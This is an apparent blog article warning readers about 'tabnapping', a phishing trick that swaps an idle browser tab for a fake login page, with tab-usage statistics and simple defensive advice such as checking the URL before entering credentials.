Tabbed browsing has been around for quite a while now, allowing users to switch between dozens of websites whilst keeping the task bar clutter free. One 2009 study discovered that users switch tabs at least 57.4% of the time, 36% of users opening new tabs for search engine use.

It’s become common practice for internet users to login to several websites at once using the tab method. A recent study of Firefox users by Mozilla revealed the following reasons for using tabbed browsing:

–    To act as a reminder to do something later
– Opening many document/search links at once
– As a substitute for the back button
– Keeping frequently used sites open
–    Temporary bookmarks

The study also found that an average of 73.3% of tab switches were revisits.

All of this would simply be an interesting way of looking at internet browsing if it weren’t for one small detail. Cyber-criminals are exploiting the system.

During a typical day in the office, you may have several applications that require a login open at once. Let’s say you have Google, LinkedIn, Twitter, BBC News and Amazon open. You’re in the middle of looking for something on Amazon, when someone asks you to find an article for them, so you switch to Google and carry out a search. After a while, you switch back to Amazon and are confronted not with the page you were previously on, but with the login page. No problem, you’ve obviously just been kicked out of the site and just need to log back in. That’s what many would assume, and that is the assumption that phishers are playing on.

“Tabnapping”, as its being called, is where a hacker uses JavaScript to manipulate one of your inactive tabs so that when you return to it, you’re on a fake login page rather than the one you’d left it on. Unless you check the url, you may not realise that the page is a fake, or that your online bank was your last tab, but is now the second. The fake page may even display a message saying that your session has timed out. Aza Raskin of Mozilla demonstrates just how easy it is to hack the tab and fool the unwitting user. (You can also find out more about the problem, and test it out for yourself over at his blog).

So, what can the user do? Normally, I would recommend installing noscript on Firefox to prevent unauthorised JavaScript from running on your computer, but that won’t help in this case. Aspects of the users behaviour need to change as well. Users should keep the number of tabs open to a minimum; always check that the url matches the site before you enter any login, financial or identity information; and if in doubt, close the tab and navigate to the page again.

It’s important to remember that when we fill out online forms and submit login details, we are entrusting our information to an organisation outside our control. It’s not enough just to trust these organisations to protect our data. We need to make sure we do, too.